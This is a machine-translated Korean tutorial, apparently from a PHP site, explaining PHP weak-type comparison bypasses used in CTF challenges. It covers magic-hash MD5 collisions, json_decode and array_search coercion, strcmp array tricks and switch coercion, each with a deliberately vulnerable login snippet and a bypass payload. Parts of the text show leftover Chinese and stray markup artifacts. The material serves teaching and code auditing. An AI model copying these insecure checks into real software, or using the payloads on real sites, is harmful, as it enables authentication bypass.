이 기사에서 공유한 내용은 PHP의 약한 유형 변환에 관한 것입니다. 이 내용은 도움이 필요한 친구들에게 큰 도움이 되기를 바랍니다.
최근 CTF 대회에서 PHP 약한 유형에 대한 질문이 여러 번 나왔습니다. PHP 약한 유형과 이를 우회하는 방법을 요약하고 싶습니다.
php에는 ==와 ===
1 <?php 2 $a = $b ; 3 $a===$b ; 4 ?>
=== 두 가지 비교 기호가 있습니다. 두 문자열의 타입이 같은지 먼저 판단 후 비교
== 비교 시 문자열 타입을 먼저 동일하게 변환한 후 비교
如果比较一个数字和字符串或者比较涉及到数字内容的字符串,则字符串会被转换成数值并且比较按照数值来进行
#🎜 🎜#여기서는 값을 문자열과 비교하면 문자열이 값으로 변환된다고 명시되어 있습니다.
1 <?php
2 var_dump("admin"==0); //true
3 var_dump("1admin"==1); //true
4 var_dump("admin1"==1) //false
5 var_dump("admin1"==0) //true
6 var_dump("0e123456"=="0e4456789"); //true
7 ?> //上述代码可自行测试2 "1admin"==1 일 때 비교하면 1admin이 숫자로 변환되어 결과가 1이 되는데 "admin1"==1은 오류, 즉 "admin1"이 0으로 변환되는 이유는 무엇일까요? ? 3 "0e123456"=="0e456789" 0e와 같은 문자열은 서로 비교하면 과학기술법상 숫자로 인식됩니다. 0의 거듭제곱은 0이므로 같습니다#🎜🎜 #
# 🎜🎜#
위 문제에 대해서는 php 매뉴얼을 확인해보니
문자열을 숫자로 처리할 경우 결과와 타입은 다음과 같습니다: 문자열에 '.', 'e', 'E'가 포함되지 않고 해당 숫자 값이 정수 문자열의 범위 내에 있는 경우#문자열은 int로 처리되며, 그 외의 모든 문자열은 int로 처리됩니다. float로 처리되는 경우 문자열의 시작 부분이 해당 값을 결정합니다. 문자열이 유효한 값으로 시작하면 해당 값이 사용됩니다. 그렇지 않으면 해당 값은 0입니다.
1 <?php 2 $test=1 + "10.5"; // $test=11.5(float) 3 $test=1+"-1.3e3"; //$test=-1299(float) 4 $test=1+"bob-1.3e3";//$test=1(int) 5 $test=1+"2admin";//$test=3(int) 6 $test=1+"admin2";//$test=1(int) 7 ?>
1 <?php
2 if (isset($_GET['Username']) && isset($_GET['password'])) {
3 $logined = true;
4 $Username = $_GET['Username'];
5 $password = $_GET['password'];
6
7 if (!ctype_alpha($Username)) {$logined = false;}
8 if (!is_numeric($password) ) {$logined = false;}
9 if (md5($Username) != md5($password)) {$logined = false;}
10 if ($logined){
11 echo "successful";
12 }else{
13 echo "login failed!";
14 }
15 }
16 ?>소개 1 0e로 시작하는 배치 md5 문자열은 위에 언급되어 있습니다.
0e는 비교 시 과학적 표기법으로 간주되므로 0e 뒤에 무엇이 오더라도 0의 거듭제곱은 여전히 0입니다#🎜 🎜# .md5('240610708') == md5('QNKCDZO')
우회에 성공했습니다!QNKCDZO 0e830400451993494058024219903391 s878926199a 0e545993274517709034328855841020 s155964671a 0e342768416822451524974117254469 s214587387a 0e848240448830537924465865611904 s214587387a 0e848240448830537924465865611904 s878926199a 0e545993274517709034328855841020 s1091221200a 0e940624217856561557816327384675 s1885207154a 0e509367213418206700842008763514
<?php
if (isset($_POST['message'])) {
$message = json_decode($_POST['message']);
$key ="*********";
if ($message->key == $key) {
echo "flag";
}
else {
echo "fail";
}
}
else{
echo "~~~~";
}
?>최종 페이로드 메시지={"key":0}
array_search is_array 우회
1 <?php
2 if(!is_array($_GET['test'])){exit();}
3 $test=$_GET['test'];
4 for($i=0;$i<count($test);$i++){
5 if($test[$i]==="admin"){
6 echo "error";
7 exit();
8 }
9 $test[$i]=intval($test[$i]);
10 }
11 if(array_search("admin",$test)===0){
12 echo "flag";
13 }
14 else{
15 echo "false";
16 }
17 ?>mixed array_search ( mixed $needle , array $haystack [, bool $strict = false ] )
$needle, $haystack은 필수, $strict는 선택 사항입니다. 이 함수는 $haystack의 값이 $needle에 있는지 확인하고 해당 키 값을 반환합니다. 세 번째 매개변수의 기본값은 false입니다. true로 설정하면 엄격한 필터링이 수행됩니다.
1 <?php
2 $a=array(0,1);
3 var_dump(array_search("admin",$a)); // int(0) => 返回键值0
4 var_dump(array_seach("1admin",$a)); // int(1) ==>返回键值1
5 ?>array_search 함수는 ==와 유사합니다. 즉, $a=="admin" 물론 $a=0 물론 세 번째 매개변수가 true이면 우회할 수 없습니다# 🎜🎜#
strcmp 취약점 우회 php -v <5.3
1 <?php
2 $password="***************"
3 if(isset($_POST['password'])){
4
5 if (strcmp($_POST['password'], $password) == 0) {
6 echo "Right!!!login success";n
7 exit();
8 } else {
9 echo "Wrong password..";
10 }
11 ?>payload: 비밀번호[]=xxx
switch Bypass
1 <?php
2 $a="4admin";
3 switch ($a) {
4 case 1:
5 echo "fail1";
6 break;
7 case 2:
8 echo "fail2";
9 break;
10 case 3:
11 echo "fail3";
12 break;
13 case 4:
14 echo "sucess"; //结果输出success;
15 break;
16 default:
17 echo "failall";
18 break;
19 }
20 ?>이 원리는 앞의 원리와 유사하므로 자세히 설명하지 않겠습니다
4 요약
이러한 PHP 약한 유형은 위의 내용은 코드 감사의 중요성을 확인합니다
관련 권장 사항:
#🎜 🎜#PHP에서 var 키워드 사용 예
php 대기열 처리: PHP 메시지 대기열 구현 원리(그림 및 텍스트)
위 내용은 PHP에서 약한 유형 변환 구현의 상세 내용입니다. 자세한 내용은 PHP 중국어 웹사이트의 기타 관련 기사를 참조하세요!
![[웹 프런트엔드] Node.js 빠른 시작](https://img.php.cn/upload/course/000/000/067/662b5d34ba7c0227.png)
